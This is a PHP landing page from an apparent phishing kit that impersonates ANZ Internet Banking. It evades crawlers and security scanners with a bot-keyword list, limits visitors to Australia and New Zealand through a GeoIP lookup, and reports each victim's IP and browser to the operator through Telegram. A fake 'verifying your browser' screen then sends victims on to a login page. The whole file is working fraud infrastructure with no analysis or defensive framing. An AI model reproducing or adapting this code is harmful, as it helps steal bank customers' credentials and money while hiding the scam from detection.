<?php
session_start();
include 'telegram.php';

// --- Real IP detection (Cloudflare-compatible) ---
function getRealIP() {
    if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) return $_SERVER['HTTP_CF_CONNECTING_IP'];
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
    return $_SERVER['REMOTE_ADDR'];
}

$ip = getRealIP();
$agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$time = date("Y-m-d H:i:s");

// --- IP Whitelist for Staff ---
$whitelist = [
    '123.45.67.89',   // Example staff IP 1 - replace with real IPs
    '98.76.54.32',    // Example staff IP 2
    // Add more IPs as needed
];

// --- Bot detection keywords ---
$bots = [
    'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'yandex',
    'baiduspider', 'facebookexternalhit', 'crawler', 'spider',
    'robot', 'crawling'
];

// --- Check if IP is whitelisted ---
if (in_array($ip, $whitelist)) {
    // Whitelisted staff access — skip bot & geo checks
    $message = "👔 ANZ Staff Access\nIP: $ip\nTime: $time\nAgent: $agent";
    sendTelegram($message);

} else {
    // --- Bot Detection ---
    $ua = strtolower($agent);
    foreach ($bots as $bot) {
        if (strpos($ua, $bot) !== false) {
            header("Location: trap.php");
            exit;
        }
    }

    // --- GeoIP Country Check (using ipwho.is) ---
    $geo = @json_decode(file_get_contents("http://ipwho.is/{$ip}"), true);
    if (!$geo || $geo['success'] !== true || !in_array(strtoupper($geo['country_code']), ['AU', 'NZ'])) {
        header("Location: trap.php");
        exit;
    }

    // --- Normal visitor Telegram Notification ---
    $message = "👁️ ANZ Visit\nIP: $ip\nTime: $time\nAgent: $agent";
    sendTelegram($message);
}

// --- Visitor Session Tracking ---
if (!isset($_SESSION['visitor_id'])) {
    $_SESSION['visitor_id'] = uniqid('v_', true);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>ANZ Internet Banking</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f4f6f8;
      color: #333;
      text-align: center;
      padding-top: 100px;
      margin: 0;
    }
    .box {
      display: inline-block;
      background: white;
      padding: 30px;
      border-radius: 6px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 400px;
      width: 90%;
    }
    button {
      background-color: #0077c8;
      color: white;
      border: none;
      padding: 12px 22px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      margin-top: 20px;
      width: 100%;
    }
    button:hover {
      background-color: #005b9f;
    }
    small {
      color: #777;
      display: block;
      margin-top: 10px;
    }
  </style>
  <script>
    // Auto redirect to login.php in 3 seconds if no interaction
    setTimeout(function() {
      window.location.href = 'login.php';
    }, 3000);
  </script>
</head>
<body>
  <div class="box">
    <h2>Welcome to ANZ Internet Banking</h2>
    <p>For your security, we are verifying your browser.</p>
    <form action="login.php" method="get">
      <button type="submit">Continue to Login</button>
    </form>
    <small>If you are not redirected automatically, please click the button above.</small>
  </div>
</body>
</html>